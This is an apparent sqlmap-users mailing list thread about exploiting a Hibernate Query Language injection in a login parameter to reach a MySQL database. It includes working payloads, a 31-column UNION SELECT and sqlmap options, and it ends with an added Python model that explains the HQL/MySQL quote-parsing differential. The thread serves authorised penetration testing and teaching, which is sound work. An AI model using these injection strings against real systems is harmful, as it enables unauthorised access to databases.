"Do you know the maximum number of fields the union will do" - by default
1-10. If there are more techniques usable (e.g. boolean), it will extend
it. Also, if ORDER BY is usable it will try to find the number of columns
without limitations. If you want to manually extend, use --union-cols (e.g.
1-100)
Bye
On Sat, Feb 25, 2017 at 12:28 AM, Robin Wood <robin@digi.ninja> wrote:
> Annoyingly my test window is closed and I'll probably not get to talk to
> the client till Monday, but I will try this out on a test box just to watch
> the traffic and see if it is doing what I think should work.
>
> Ta
>
> Robin
>
> On Fri, 24 Feb 2017, 23:23 Chris Oakley, <christopher.oak...@gmail.com>
> wrote:
>
>> I *think* (going from memory here) that it's higher than that by
>> default. There's also the --union-cols=30-40, so you should be good
>>
>> On 24 February 2017 at 18:17, Robin Wood <robin@digi.ninja> wrote:
>>
>> I hadn't tried the custom injection point, I'll give that a try. Do you
>> know the maximum number of fields the union will do? I was thinking about it
>> after shutting the machine down and think it's 30, so I will need to increase that.
>>
>> Robin
>>
>> On Fri, 24 Feb 2017, 23:14 Chris Oakley, <christopher.oak...@gmail.com>
>> wrote:
>>
>> I assume you've tried * for custom injection point and --technique=U?
>>
>> Whether or not it'll dance with HQL is another question entirely.
>>
>> On 24 February 2017 at 16:44, Robin Wood <robin@digi.ninja> wrote:
>>
>> I've just found an instance of Hibernate Query Language injection that
>> lets me get at an underlying MySQL database if I inject in the right way.
>> Some examples I've got are:
>>
>> loginName=a - works and gives 200
>> loginName=' - fails with HQL error and 500
>> loginName=a' or 'a'='a - works and gives 200
>> loginName=a\'' - gets through HQL and then generates a MySQL error in a
>> where clause. The injection gets converted to where NAME='a\'''
>>
>> With some playing I've found that this is a valid injection and they are
>> running as root, as I get a 500 back when I supply root and a 200 when I give
>> something else.
>>
>> loginName=a' and 'a\''="a" union select @@version,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,2,3,4,5,"2001-01-01",2,3,"2001-01-01","2001-01-01" from users where user()="root@localhost" -- '='1
>>
>> The 500 is because some of the stuff from the union isn't being handled
>> correctly by the page; the 200 is because the union doesn't return any data,
>> so the first bit (basically a=a) is returning valid data and getting through
>> the rest of the parsing.
>>
>> So I think what I need to do is to tell SQLMap that it is a union
>> injection with 31 fields and that the injection needs to go into here:
>>
>> loginName=a' and 'a\''="a" <INJECT> -- '='1
>>
>> Can I do this?
>>
>> I've got all this set up and running in Burp so I can test things out if
>> anyone needs me to.
>>
>> Robin
>>
>> ------------------------------------------------------------------------------
>> Check out the vibrant tech community on one of the world's most
>> engaging tech sites, SlashDot.org! http://sdm.link/slashdot
>> _______________________________________________
>> sqlmap-users mailing list
>> sqlmap-users@lists.sourceforge.net
>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
--
Miroslav Stampar
http://about.me/stamparm
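The loginName probes from Robin's message, run through a small parser-differential model that shows why `'` fails in HQL, why `a\''` passes HQL but breaks MySQL, and why the `-- '='1` suffix keeps the quotes balanced for both engines while the `union select` only reaches MySQL unquoted. This is an added example, not code from the thread, from Hibernate or from sqlmap. It assumes the quoting rules written in the comments (HQL escapes a quote only by doubling it and treats backslash as an ordinary character; MySQL in its default sql_mode also honours backslash escapes, double-quoted strings and `-- ` comments), and it models the query as `where NAME='<input>'`, which is how the thread reports the value being spliced in. The three-column payload stands in for the 31-column one in the thread.

```python
"""Quote-handling differential between an HQL-style and a MySQL-style
literal scanner, driven by the loginName probes from the thread.

Added example; not code from the thread, Hibernate or sqlmap. The dialect
rules below are assumptions, not facts the thread states.
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class Dialect:
    name: str
    quotes: str               # characters that delimit string literals
    backslash_escapes: bool   # does "\x" inside a literal escape x?
    dash_comments: bool       # does "-- " start an end-of-line comment?


# Assumed rules: HQL escapes a quote only by doubling it and keeps a
# backslash as an ordinary character; MySQL (default sql_mode, without
# NO_BACKSLASH_ESCAPES) also accepts "\'" escapes, "..." strings and "-- ".
HQL = Dialect("HQL", quotes="'", backslash_escapes=False, dash_comments=False)
MYSQL = Dialect("MySQL", quotes="'\"", backslash_escapes=True, dash_comments=True)


def scan(sql: str, d: Dialect):
    """Split `sql` into ("raw", text) and ("str", value) tokens under dialect d.

    Returns (tokens, balanced). balanced is False when a literal is still open
    at end of input, which is what makes the real engine raise a syntax error.
    Text after a "-- " comment (where the dialect has them) is dropped.
    """
    tokens, raw = [], []
    i, n = 0, len(sql)
    while i < n:
        if d.dash_comments and sql.startswith("-- ", i):
            break                               # rest of the line is a comment
        c = sql[i]
        if c not in d.quotes:
            raw.append(c)
            i += 1
            continue
        if raw:
            tokens.append(("raw", "".join(raw)))
            raw = []
        q, buf, closed = c, [], False
        i += 1
        while i < n:
            c = sql[i]
            if d.backslash_escapes and c == "\\" and i + 1 < n:
                buf.append(sql[i + 1])          # backslash escape
                i += 2
            elif c == q and i + 1 < n and sql[i + 1] == q:
                buf.append(q)                   # doubled delimiter
                i += 2
            elif c == q:
                closed = True                   # end of literal
                i += 1
                break
            else:
                buf.append(c)
                i += 1
        tokens.append(("str", "".join(buf)))
        if not closed:
            return tokens, False
    if raw:
        tokens.append(("raw", "".join(raw)))
    return tokens, True


def wrap(login_name: str) -> str:
    """The thread reports the value landing in `where NAME='<input>'`."""
    return f"where NAME='{login_name}'"


def outcome(login_name: str) -> str:
    """'hql_error' (HQL rejects), 'mysql_error' (HQL accepts, MySQL rejects) or 'ok'."""
    query = wrap(login_name)
    if not scan(query, HQL)[1]:
        return "hql_error"
    return "ok" if scan(query, MYSQL)[1] else "mysql_error"


def union_reaches(login_name: str, d: Dialect) -> bool:
    """True if 'union select' sits outside every string literal under dialect d."""
    tokens, balanced = scan(wrap(login_name), d)
    return balanced and any(k == "raw" and "union select" in v.lower() for k, v in tokens)


# Three-column stand-in for the 31-column payload in the thread (constructed input).
PAYLOAD = r"""a' and 'a\''="a" union select @@version,2,3 from users where user()="root@localhost" -- '='1"""

if __name__ == "__main__":
    for probe in ["a", "'", "a' or 'a'='a", r"a\''", PAYLOAD]:
        print(f"{probe!r:>40}  ->  {outcome(probe)}")
    for d in (HQL, MYSQL):
        print(d.name, "sees the union unquoted:", union_reaches(PAYLOAD, d))
```

Under the HQL rules the whole middle of the payload, from `a\'` through `-- `, is one string literal compared against `'1'`, so HQL sees nothing but `NAME='a' and '...'='1'`; under the MySQL rules `'a\''` closes after the escaped quote, `"a"` is its own literal, and `-- ` discards the trailing `'='1'`, leaving `union select` as live SQL. The same mechanism is what a 31-column `--union-cols=31` run with a `*` marker in that position has to survive.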